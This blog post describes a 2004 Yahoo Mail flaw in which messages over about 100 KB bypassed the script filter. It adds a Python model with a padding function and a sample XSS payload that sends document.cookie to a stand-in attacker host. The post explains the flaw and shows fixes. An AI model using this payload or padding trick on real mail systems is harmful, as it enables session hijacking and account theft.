Thursday, April 22, 2004

Yahoo Mail Fixes Security Flaw, Was Open to Account Hijacking

Yahoo Mail was open to account hijacking because of a message-size bug. ZDNet reports that a flaw in the Yahoo Mail system could have let attackers take control of victims’ Yahoo accounts.

Yahoo has fixed a bug in its Yahoo Mail web-mail system that would have allowed attackers to seize control of users’ email accounts. The bug let an attacker take over a user’s account simply by sending them a specially crafted email: script embedded in the message ran in the victim’s Yahoo Mail session when the message was viewed.

The security flaw, according to eEye Digital Security’s Drew Copley, allowed attackers to bypass the web-mail system’s JavaScript filter: any message exceeding approximately 100 KB in length was not analysed by the filter, which is meant to strip messages of any potentially malicious JavaScript.

“A remarkable note about this bug is that no one seems to have found it before,” Copley’s advisory reads. “As far as anyone knows.”

Technical Description:
———–EXAMPLE EMAIL———

SCRIPT
[->a bunch of chars here [spaces are most stealth], the whole file size will be just about 100KB]
[this causes the filter to not work… the code is then run automatically]

———————————

The pseudo-diagram above explains the scenario rather well. For whatever reason, Yahoo’s email filter simply does not work on files which exceed a certain range. This kind of software issue is relatively common. A remarkable note about this bug is that no one seems to have found it before.
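To make the failure mode concrete, here is an added Python model of the scenario (example code written for this post, not Yahoo’s filter or eEye’s advisory code). The vulnerable version skips sanitising once a message crosses a size threshold, the attacker pads the message past that threshold with spaces, and two hardened variants fail closed. The 100 KB threshold, the regex-based stripper and the sample payload are assumptions for illustration only.

```python
import re

# Assumed threshold: the advisory only says "approximately 100kb".
SIZE_LIMIT = 100 * 1024

# Simplified stand-in for the web-mail sanitiser: strips <script> blocks and
# inline event-handler attributes. A real sanitiser must do far more than this;
# the point here is only where the size check sits relative to it.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
HANDLER_RE = re.compile(r"\s+on\w+\s*=\s*(?:\"[^\"]*\"|'[^']*'|[^\s>]+)", re.IGNORECASE)


def strip_active_content(html: str) -> str:
    html = SCRIPT_RE.sub("", html)
    return HANDLER_RE.sub("", html)


def vulnerable_filter(message: str) -> str:
    """Models the reported flaw: messages over the limit are passed through unfiltered."""
    if len(message.encode("utf-8")) > SIZE_LIMIT:
        return message  # sanitiser silently skipped: this branch is the bug
    return strip_active_content(message)


def fixed_filter_always(message: str) -> str:
    """Fix 1: sanitise regardless of size."""
    return strip_active_content(message)


def fixed_filter_reject(message: str) -> str:
    """Fix 2: fail closed; never render something the sanitiser did not process."""
    if len(message.encode("utf-8")) > SIZE_LIMIT:
        raise ValueError("message exceeds sanitiser limit; refusing to render unfiltered")
    return strip_active_content(message)


def craft_padded_message(payload: str, target_size: int = SIZE_LIMIT + 1024) -> str:
    """Attacker side: pad the payload with spaces until it crosses the threshold."""
    padding_needed = max(0, target_size - len(payload.encode("utf-8")))
    return payload + " " * padding_needed


def contains_active_content(html: str) -> bool:
    return bool(SCRIPT_RE.search(html) or HANDLER_RE.search(html))


# Constructed sample payload (hypothetical attacker host): script that would run
# in the victim's web-mail session if it reached the browser unfiltered.
SAMPLE_PAYLOAD = (
    "<p>hello</p>"
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
    '<img src="x" onerror="alert(1)">'
)


def demo() -> dict:
    """Runs the small and padded payloads through each filter and reports what survives."""
    small = SAMPLE_PAYLOAD
    big = craft_padded_message(SAMPLE_PAYLOAD)
    result = {
        "small_through_vulnerable": contains_active_content(vulnerable_filter(small)),
        "big_through_vulnerable": contains_active_content(vulnerable_filter(big)),
        "big_through_fixed_always": contains_active_content(fixed_filter_always(big)),
    }
    try:
        fixed_filter_reject(big)
        result["big_through_fixed_reject"] = "rendered"
    except ValueError:
        result["big_through_fixed_reject"] = "rejected"
    return result


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The lesson is not the stripper itself but the control flow around it: any branch that returns the raw message because it is "too big to scan" is a bypass waiting to be padded, and the same pattern shows up in attachment scanners and WAFs with inspection limits. When testing a filter of this kind, send yourself a message just over the size it will process and check whether the active content survives.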

Yahoo has fixed the Yahoo Mail bug.

3 comments:

  1. Nice man. Extremely informative post. I'll be sure to pass this along to my friends.

    Chevrolet Cobalt Turbocharger

  2. It is a pleasure going through your post. I have bookmarked you to check out new stuff from your side.

    Get Facebook Fans
    Get YouTube Likes
    How To Get Twitter Followers

  3. Hi, Nice post thanks for sharing. Would you please consider adding a link to my website on your page. Please email me back.

    Thanks!

    Joel
    JHouston791@gmail.com
